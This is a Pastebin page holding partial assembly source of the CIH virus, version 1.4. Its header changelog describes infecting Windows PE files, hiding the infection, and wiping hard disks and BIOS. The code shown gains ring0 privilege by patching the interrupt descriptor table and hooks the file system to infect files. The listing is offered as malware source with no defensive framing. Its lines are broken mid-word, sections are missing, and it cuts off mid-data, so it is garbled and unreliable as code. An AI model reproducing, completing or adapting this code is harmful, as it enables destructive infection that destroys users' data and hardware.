Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ; ********************************************************************
- ********
- ; * The Virus Program Information
- *
- ; ********************************************************************
- ********
- ; *
- *
- ; * Designer : CIH Source : TTIT of TATUNG in Tai
- wan *
- ; * Create Date : 04/26/1998 Now Version : 1.4
- *
- ; * Modification Time : 05/31/1998
- *
- ; *
- *
- ; * Turbo Assembler Version 4.0 : tasm /m cih
- *
- ; * Turbo Link Version 3.01 : tlink /3 /t cih, cih.exe
- *
- ; *
- *
- ; *===================================================================
- =======*
- ; * Modification History
- *
- ; *===================================================================
- =======*
- ; * v1.0 1. Create the Virus Program.
- *
- ; * 2. The Virus Modifies IDT to Get Ring0 Privilege.
- *
- ; * 04/26/1998 3. Virus Code doesn't Reload into System.
- *
- ; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File S
- ystem. *
- ; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApi
- Hook. *
- ; * 6. When System Opens Existing PE File, the File will b
- e *
- ; * Infected, and the File doesn't be Reinfected.
- *
- ; * 7. It is also Infected, even the File is Read-Only.
- *
- ; * 8. When the File is Infected, the Modification Date an
- d Time *
- ; * of the File also don't be Changed.
- *
- ; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not
- Call *
- ; * Previous FileSystemApiHook, it will Call the Functi
- on *
- ; * that the IFS Manager Would Normally Call to Impleme
- nt *
- ; * this Particular I/O Request.
- *
- ; * 10. The Virus Size is only 656 Bytes.
- *
- ; *===================================================================
- =======*
- ; * v1.1 1. Especially, the File that be Infected will not Incr
- ease *
- ; * it's Size... ^__^
- *
- ; * 05/15/1998 2. Hook and Modify Structured Exception Handing.
- *
- ; * When Exception Error Occurs, Our OS System should b
- e in *
- ; * Windows NT. So My Cute Virus will not Continue to R
- un, *
- ; * it will Jmup to Original Application to Run.
- *
- ; * 3. Use Better Algorithm, Reduce Virus Code Size.
- *
- ; * 4. The Virus "Basic" Size is only 796 Bytes.
- *
- ; *===================================================================
- =======*
- ; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer...
- *
- ; * 2. Modify the Bug of v1.1
- *
- ; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes.
- *
- ; *===================================================================
- =======*
- ; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Er
- ror. *
- ; * So When Open WinZip Self-Extractor ==> Don't Infect
- it. *
- ; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes.
- *
- ; *===================================================================
- =======*
- ; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs
- Error. *
- ; * 2. Change the Date of Killing Computers.
- *
- ; * 05/31/1998 3. Modify Virus Version Copyright.
- *
- ; * 4. The Virus "Basic" Size is 1019 Bytes.
- *
- ; ********************************************************************
- ********
- .586P
- ; ********************************************************************
- ********
- ; * Original PE Executable File(Don't Modify this Section)
- *
- ; ********************************************************************
- ********
- OriginalAppEXE SEGMENT
- FileHeader:
- db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
- db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
- db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
- db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
- db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
- db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
- db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
- db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
- db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
- db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
- db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
- db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
- db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
- db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
- db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
- db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
- db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
- db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
- db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
- db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- dd 00000000h, VirusSize
- lea ecx, StopToRunVirusCode-@0[ebx]
- push ecx
- push eax
- ; *************************************
- ; * Let's Modify *
- ; * IDT(Interrupt Descriptor Table) *
- ; * to Get Ring0 Privilege... *
- ; *************************************
- push eax ;
- sidt [esp-02h] ; Get IDT Base Address
- pop ebx ;
- add ebx, HookExceptionNumber*08h+04h ; ZF
- = 0
- cli
- mov ebp, [ebx] ; Get Exception Base
- mov bp, [ebx-04h] ; Entry Point
- lea esi, MyExceptionHook-@1[ecx]
- push esi
- mov [ebx-04h], si ;
- shr esi, 16 ; Modify Excep
- tion
- mov [ebx+02h], si ; Entry Point
- Address
- pop esi
- ; *************************************
- ; * Generate Exception to Get Ring0 *
- ; *************************************
- int HookExceptionNumber ; GenerateExce
- ption
- ReturnAddressOfEndException = $
- ; *************************************
- ; * Merge All Virus Code Section *
- ; *************************************
- ; *************************************
- ; * Generate Exception Again *
- ; *************************************
- int HookExceptionNumber ; GenerateExce
- ption Aga
- ; *************************************
- ; * Let's Restore *
- ; * Structured Exception Handing *
- ; *************************************
- ReadyRestoreSE:
- sti
- xor ebx, ebx
- jmp RestoreSE
- ; *************************************
- ; * When Exception Error Occurs, *
- ; * Our OS System should be in NT. *
- ; * So My Cute Virus will not *
- ; * Continue to Run, it Jmups to *
- ; * Original Application to Run. *
- ; *************************************
- StopToRunVirusCode:
- @1 = StopToRunVirusCode
- xor ebx, ebx
- mov eax, fs:[ebx]
- mov esp, [eax]
- RestoreSE:
- pop dword ptr fs:[ebx]
- pop eax
- ; *************************************
- ; * Return Original App to Execute *
- ; *************************************
- pop ebp
- push 00401000h ; Push Original
- OriginalAddressOfEntryPoint = $-4 ; App Entry Point to S
- tack
- ret ; Return to Original App Entry Point
- ; *********************************************************
- ; * Ring0 Virus Game Initial Program *
- ; *********************************************************
- MyExceptionHook:
- @2 = MyExceptionHook
- jz InstallMyFileSystemApiHook
- ; *************************************
- ; * Do My Virus Exist in System !? *
- ; *************************************
- mov ecx, dr0
- jecxz AllocateSystemMemoryPage
- add dword ptr [esp], ReadyRestoreSE-Return
- AddressOf
- dException
- ; *************************************
- ; * Return to Ring3 Initial Program *
- ; *************************************
- ExitRing0Init:
- mov [ebx-04h], bp ;
- shr ebp, 16 ; Restore Exception
- mov [ebx+02h], bp ;
- iretd
- ; *************************************
- ; * Allocate SystemMemory Page to Use *
- ; *************************************
- AllocateSystemMemoryPage:
- mov dr0, ebx ; Set the Mark of My V
- irus Exis
- in System
- push 00000000fh ;
- push ecx ;
- push 0ffffffffh ;
- push ecx ;
- push ecx ;
- push ecx ;
- push 000000001h ;
- push 000000002h ;
- int 20h ; VMMCALL _PageAllocat
- e
- _PageAllocate = $ ;
- dd 00010053h ; Use EAX, ECX, EDX, a
- nd flags
- add esp, 08h*04h
- xchg edi, eax ; EDI = SystemMemory S
- tart Addr
- s
- lea eax, MyVirusStart-@2[esi]
- iretd ; Return to Ring3 Initial Program
- ; *************************************
- ; * Install My File System Api Hook *
- ; *************************************
- InstallMyFileSystemApiHook:
- lea eax, FileSystemApiHook-@6[edi]
- push eax ;
- int 20h ; VXDCALL IFSMgr_InstallFileSyste
- mApiHook
- IFSMgr_InstallFileSystemApiHook = $ ;
- dd 00400067h ; Use EAX, ECX, EDX, a
- nd flags
- mov dr0, eax ; Save OldFileSystemAp
- iHook Add
- ss
- pop eax ; EAX = FileSystemApiHook Addr
- ess
- ; Save Old IFSMgr_InstallFileSystemApiHook Ent
- ry Point
- mov ecx, IFSMgr_InstallFileSystemApiHook-@
- 2[esi]
- mov edx, [ecx]
- mov OldInstallFileSystemApiHook-@3[eax], e
- dx
- ; Modify IFSMgr_InstallFileSystemApiHook Entry
- Point
- lea eax, InstallFileSystemApiHook-@3[eax]
- mov [ecx], eax
- cli
- jmp ExitRing0Init
- ; *********************************************************
- ; * Code Size of Merge Virus Code Section *
- ; *********************************************************
- CodeSizeOfMergeVirusCodeSection = offset $
- ; *********************************************************
- ; * IFSMgr_InstallFileSystemApiHook *
- ; *********************************************************
- InstallFileSystemApiHook:
- push ebx
- call @4 ;
- @4: ;
- pop ebx ; mov ebx, offset FileSystemAp
- iHook
- add ebx, FileSystemApiHook-@4 ;
- push ebx
- int 20h ; VXDCALL IFSMgr_RemoveFileSystem
- ApiHook
- IFSMgr_RemoveFileSystemApiHook = $
- dd 00400068h ; Use EAX, ECX, EDX, a
- nd flags
- pop eax
- ; Call Original IFSMgr_InstallFileSystemApiHoo
- k
- ; to Link Client FileSystemApiHook
- push dword ptr [esp+8]
- call OldInstallFileSystemApiHook-@3[ebx]
- pop ecx
- push eax
- ; Call Original IFSMgr_InstallFileSystemApiHoo
- k
- ; to Link My FileSystemApiHook
- push ebx
- call OldInstallFileSystemApiHook-@3[ebx]
- pop ecx
- mov dr0, eax ; Adjust OldFileSystem
- ApiHook A
- ress
- pop eax
- pop ebx
- ret
- ; *********************************************************
- ; * Static Data *
- ; *********************************************************
- OldInstallFileSystemApiHook dd ?
- &nb
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement